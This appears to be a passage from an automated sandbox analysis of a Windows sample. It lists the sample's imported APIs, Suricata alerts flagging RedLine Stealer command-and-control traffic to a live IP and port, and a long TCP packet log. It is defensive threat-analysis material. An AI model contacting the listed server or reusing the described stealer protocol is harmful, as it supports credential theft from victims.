TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-24T09:07:10.222100+0100	1800000	Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect	1	192.168.2.4	49730	185.222.58.90	55615	TCP
2024-12-24T09:07:10.222100+0100	2849662	ETPRO MALWARE RedLine - CheckConnect Request	1	192.168.2.4	49730	185.222.58.90	55615	TCP
2024-12-24T09:07:15.348866+0100	2045000	ET MALWARE RedLine Stealer - CheckConnect Response	1	185.222.58.90	55615	192.168.2.4	49730	TCP
2024-12-24T09:07:15.649470+0100	2849351	ETPRO MALWARE RedLine - EnvironmentSettings Request	1	192.168.2.4	49730	185.222.58.90	55615	TCP
2024-12-24T09:07:19.970490+0100	2045001	ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound	1	185.222.58.90	55615	192.168.2.4	49730	TCP
2024-12-24T09:07:20.253921+0100	2849352	ETPRO MALWARE RedLine - SetEnvironment Request	1	192.168.2.4	49732	185.222.58.90	55615	TCP
2024-12-24T09:07:23.396942+0100	2848200	ETPRO MALWARE RedLine - GetUpdates Request	1	192.168.2.4	49734	185.222.58.90	55615	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 24, 2024 09:07:08.808866024 CET	49730	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:08.928469896 CET	55615	49730	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:08.928591967 CET	49730	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:08.943974972 CET	49730	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:09.063496113 CET	55615	49730	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:09.302311897 CET	49730	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:09.422049046 CET	55615	49730	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:10.170922995 CET	55615	49730	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:10.222100019 CET	49730	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:15.229016066 CET	49730	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:15.229069948 CET	49730	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:15.348865986 CET	55615	49730	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:15.348889112 CET	55615	49730	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:15.649280071 CET	55615	49730	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:15.649331093 CET	55615	49730	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:15.649368048 CET	55615	49730	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:15.649470091 CET	49730	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:15.651402950 CET	55615	49730	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:15.651442051 CET	55615	49730	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:15.651483059 CET	49730	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:15.706438065 CET	49730	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:15.726368904 CET	55615	49730	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:15.726452112 CET	55615	49730	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:15.726464033 CET	55615	49730	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:15.726479053 CET	55615	49730	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:15.726522923 CET	49730	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:15.726578951 CET	49730	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:19.850333929 CET	49730	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:19.850625992 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:19.970375061 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:19.970455885 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:19.970489979 CET	55615	49730	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:19.970582008 CET	49730	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:19.971282005 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:19.971503973 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:20.090837955 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:20.090946913 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:20.091062069 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:20.091073990 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:20.091085911 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:20.091125965 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:20.091149092 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:20.091209888 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:20.091268063 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:20.091290951 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:20.091300964 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:20.091337919 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:20.091356039 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:20.091387033 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:20.091408014 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:20.091417074 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:20.091433048 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:20.091454983 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:20.210655928 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:20.210697889 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:20.210710049 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:20.210787058 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:20.210804939 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:20.210814953 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:20.210855007 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:20.210886002 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:20.211544991 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:20.253771067 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:20.253921032 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:20.372908115 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:20.373050928 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:20.420907974 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:20.420973063 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:20.536670923 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:20.536745071 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:20.624758005 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:20.624830961 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:20.776752949 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:20.776839972 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:20.940877914 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:20.941085100 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:20.941175938 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.060914040 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.060983896 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.061047077 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.061075926 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.061075926 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.061104059 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.061115980 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.061136007 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.061147928 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.061152935 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.061182022 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.061208963 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.061232090 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.061235905 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.061254025 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.061269045 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.061290026 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.061319113 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.061326981 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.061346054 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.061359882 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.061398983 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.061399937 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.061450005 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.061484098 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.061495066 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.061532974 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.061536074 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.061566114 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.061621904 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.061650991 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.061682940 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.061733961 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.061775923 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.061856031 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.061943054 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.061986923 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.062000990 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.062077999 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.062082052 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.062118053 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.062124014 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.062170029 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.062213898 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.062257051 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.062349081 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.062401056 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.062505007 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.062534094 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.062560081 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.062565088 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.062585115 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.062613010 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.062649965 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.062807083 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.104690075 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.104772091 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.181303978 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.181415081 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.182059050 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.182113886 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.182147026 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.182240009 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.182255983 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.182288885 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.182356119 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.182375908 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.182404995 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.182456017 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.182517052 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.182545900 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.182594061 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.182610035 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.182622910 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.182646036 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.182655096 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.182662010 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.182699919 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.182729006 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.182782888 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.182796001 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.182842016 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.182869911 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.182888031 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.182890892 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.182955980 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.182971954 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.183007002 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.183121920 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.183151007 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.183177948 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.183178902 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.183197975 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.183207035 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.183226109 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.183253050 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.183259010 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.183290005 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.183319092 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.183336973 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.183367968 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.183396101 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.183424950 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.183451891 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.183465958 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.183480024 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.183501959 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.183502913 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.183531046 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.183588028 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.183629036 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.183656931 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.183681011 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.183685064 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.183717012 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.183721066 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.183728933 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.183768988 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.183770895 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.183798075 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.183846951 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.183852911 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.183875084 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.183907032 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.183932066 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.183952093 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.184011936 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.184041977 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.184089899 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.184102058 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.184143066 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.184156895 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.184190989 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.184252024 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.184277058 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.184325933 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.184382915 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.184403896 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.184432030 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.184458017 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.184473038 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.184520006 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.184551001 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.184602976 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.184617996 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.184648037 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.184676886 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.184693098 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.184695005 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.184736967 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.184766054 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.184784889 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.184791088 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.184813976 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.184838057 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.184844971 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.184861898 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.184943914 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.225157022 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.225267887 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.301007986 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.301059961 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.301088095 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.301120043 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.301785946 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.301848888 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.301889896 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.301923990 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.301944971 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.301968098 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.302212954 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.302352905 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.302403927 CET	49732	55615	192.168.2.4	185.222.58.90
